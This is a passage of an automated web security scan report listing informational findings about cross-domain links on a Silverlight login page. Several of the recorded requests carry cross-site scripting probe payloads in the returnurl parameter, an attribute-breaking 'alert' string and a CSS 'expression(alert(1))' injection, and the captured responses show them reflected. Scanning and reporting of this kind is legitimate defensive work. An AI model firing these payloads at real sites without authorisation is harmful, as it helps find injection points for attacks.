<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343532&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343532&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343532&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.151. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343424&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=estxpnefl0jux055r4kdsjai; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:33:44 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343424&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343424&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343424&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.152. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351171&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:32:52 GMT
Content-Length: 12978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351171&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351171&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351171&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">here</a>
...[SNIP]...

22.153. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402685&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:01:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:51:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402685&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402685&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402685&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.154. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343488&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=m0cc0c5543utnq45iihsjzq0; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:34:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:24:49 GMT
Content-Length: 13160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343488&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343488&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343488&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.155. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343042&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ezlsvr2tttmxii3pjitfng45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:22 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:22 GMT
Content-Length: 13160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343042&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343042&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343042&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.156. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344793&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 26

renderableItem=%2Fshow%2F0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iw0tmg555utr4x45q5l5ju45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:56:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:33 GMT
Content-Length: 13452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344793&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344793&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344793&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631">here</a>
...[SNIP]...

22.157. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344500&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:51:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:41 GMT
Content-Length: 15108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344500&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.158. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402712&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:01:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:51:52 GMT
Content-Length: 15108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402712&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.159. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406152&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oskbdk551vwbxu55kiwfw5zm; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:59:12 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:49:11 GMT
Content-Length: 13452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406152&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406152&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406152&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&lc=1033&id=265631">here</a>
...[SNIP]...

22.160. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343546&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:35:46 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:25:46 GMT
Content-Length: 15108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343546&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.161. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351901&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:45:01 GMT
Content-Length: 12978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
